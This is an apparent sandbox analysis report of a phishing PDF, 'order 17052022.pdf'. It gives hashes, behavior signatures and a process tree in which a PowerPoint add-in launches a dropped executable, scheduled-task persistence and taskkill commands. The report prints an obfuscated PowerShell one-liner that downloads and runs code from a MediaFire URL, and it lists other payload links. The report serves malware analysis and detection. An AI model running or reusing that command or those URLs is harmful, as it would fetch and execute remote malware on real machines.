General

Target: order 17052022.pdf
Filesize: 30KB
Completed: 17-05-2022 19:26
Task: behavioral2
Score: 10/10
MD5: f7da10c601fc5c0c2caef9f4e06508ad
SHA1: b1f40f4752866c30fbd6654f4844d13ae2958946
SHA256: 0bf9fd42a0dc842dfe8ad1d5fdaa3f74e5e2ff602887dcfdbc14466f51eef6e0
SHA512: 999c1cf265bd24b51a75bbe6651b2c5b7637b8df6e89a5740e31b6d9e9a74bff19c5ddd8fb445d42cfbe01f26c92db0afa273480f85895a83530ed68a9a392c3

Malware Config

Extracted

Language: ps1
Deobfuscated

URLs
ps1.dropper | https://www.mediafire.com/file/ivgr6qe4jfzd1w9/14.dll/file

Signatures 16

  • Executes dropped EXE
    ddond.com

    Reported IOCs

    pid  | process
    4992 | ddond.com
  • Adds Run key to start application
    msedge.exe

    TTPs

    Registry Run Keys / Startup Folder, Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
  • Drops file in Program Files directory
    setup.exe

    Reported IOCs

    description | ioc | process
    File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\cc12dc4b-a323-437b-9e64-571415a0833e.tmp | setup.exe
    File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220517212452.pma | setup.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Checks processor information in registry
    AcroRd32.exe, POWERPNT.EXE

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AcroRd32.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | AcroRd32.exe
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | POWERPNT.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | POWERPNT.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | POWERPNT.EXE
  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pid  | process
    3180 | schtasks.exe
  • Enumerates system info in registry
    msedge.exe, POWERPNT.EXE

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | POWERPNT.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | POWERPNT.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | POWERPNT.EXE
  • Kills process with taskkill
    taskkill.exe (3 instances)

    Reported IOCs

    pid  | process
    5860 | taskkill.exe
    5928 | taskkill.exe
    3828 | taskkill.exe
  • Modifies Internet Explorer settings
    AcroRd32.exe

    TTPs

    Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | AcroRd32.exe
  • Modifies registry class
    msedge.exe

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
    Key created | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings | msedge.exe
  • Suspicious behavior: AddClipboardFormatListener
    POWERPNT.EXE

    Reported IOCs

    pid  | process
    5572 | POWERPNT.EXE
  • Suspicious behavior: EnumeratesProcesses
    msedge.exe (5 instances), AcroRd32.exe, identity_helper.exe

    Reported IOCs

    pid  | process             | occurrences
    1188 | msedge.exe          | 2
    1748 | msedge.exe          | 2
    64   | AcroRd32.exe        | 18
    4500 | msedge.exe          | 2
    5176 | msedge.exe          | 2
    5252 | msedge.exe          | 2
    5360 | identity_helper.exe | 2
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    msedge.exe

    Reported IOCs

    pid  | process    | occurrences
    4500 | msedge.exe | 6
  • Suspicious use of FindShellTrayWindow
    AcroRd32.exe, msedge.exe

    Reported IOCs

    pid  | process      | occurrences
    64   | AcroRd32.exe | 1
    4500 | msedge.exe   | 19
  • Suspicious use of SetWindowsHookEx
    AcroRd32.exe, AdobeARM.exe, POWERPNT.EXE

    Reported IOCs

    pid  | process      | occurrences
    64   | AcroRd32.exe | 6
    5176 | AdobeARM.exe | 1
    5572 | POWERPNT.EXE | 6
  • Suspicious use of WriteProcessMemory
    AcroRd32.exe, RdrCEF.exe

    Reported IOCs

    description                     | pid | process      | target process | occurrences
    PID 64 wrote to memory of 216   | 64  | AcroRd32.exe | RdrCEF.exe     | 3
    PID 216 wrote to memory of 3648 | 216 | RdrCEF.exe   | RdrCEF.exe     | 41
    PID 64 wrote to memory of 3484  | 64  | AcroRd32.exe | msedge.exe     | 2
    PID 216 wrote to memory of 4336 | 216 | RdrCEF.exe   | RdrCEF.exe     | 18
Processes 46
  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\order 17052022.pdf"
    Checks processor information in registry
    Modifies Internet Explorer settings
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of FindShellTrayWindow
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:64
    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      Suspicious use of WriteProcessMemory
      PID:216
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=56EC53DF2B66CBC934083B75DF6946BE --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        PID:3648
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=844C07BE9E116AF808E5ECFD12437D25 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=844C07BE9E116AF808E5ECFD12437D25 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1
        PID:4336
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=81E7FF4BEE639EC88E4D66CADBF1CFA2 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=81E7FF4BEE639EC88E4D66CADBF1CFA2 --renderer-client-id=4 --mojo-platform-channel-handle=2184 --allow-no-sandbox-job /prefetch:1
        PID:1592
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FED20838FB90D99B288D239A6DEDE4A5 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        PID:3064
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6D09F45E2CD1C838820AD835962F84C0 --mojo-platform-channel-handle=2584 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        PID:3828
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=23538A52D9CE8B9B15013A64AF1D2646 --mojo-platform-channel-handle=1956 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        PID:1348
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/v4sy07laokbd5at/14.ppam/file
      PID:3484
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb62aa46f8,0x7ffb62aa4708,0x7ffb62aa4718
        PID:1472
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,18208547420295663251,11644268674043182771,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
        PID:4776
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,18208547420295663251,11644268674043182771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
        Suspicious behavior: EnumeratesProcesses
        PID:1748
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/v4sy07laokbd5at/14.ppam/file
      Adds Run key to start application
      Enumerates system info in registry
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:4500
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb62aa46f8,0x7ffb62aa4708,0x7ffb62aa4718
        PID:3120
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
        PID:3612
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:3
        Suspicious behavior: EnumeratesProcesses
        PID:1188
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2984 /prefetch:8
        PID:1296
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:1
        PID:2004
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
        PID:4000
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1
        PID:2836
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4492 /prefetch:8
        PID:1720
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4072 /prefetch:8
        PID:4680
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
        PID:4104
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
        Suspicious behavior: EnumeratesProcesses
        PID:5176
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5928 /prefetch:8
        PID:5236
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:8
        Suspicious behavior: EnumeratesProcesses
        PID:5252
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:1
        PID:5388
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
        PID:5404
      • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
        "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: AddClipboardFormatListener
        Suspicious use of SetWindowsHookEx
        PID:5572
        • C:\ProgramData\ddond.com
          C:\ProgramData\ddond.com https://taxfile.mediafire.com/file/v9m1dw47xgtetw9/14.htm/file
          Executes dropped EXE
          PID:4992
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/ivgr6qe4jfzd1w9/14.dll/file'))));Invoke-Expression $MMMMMMM
            PID:804
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 82 /tn calendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/8pmejv253qhljtn/14.htm/file"""
            Creates scheduled task(s)
            PID:3180
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
            Kills process with taskkill
            PID:5860
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
            Kills process with taskkill
            PID:5928
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
            Kills process with taskkill
            PID:3828
      • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
        "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
        PID:5732
      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:8
        PID:5756
      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
        Drops file in Program Files directory
        PID:5808
        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff759d75460,0x7ff759d75470,0x7ff759d75480
          PID:5924
      • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
        "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
        PID:6016
      • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
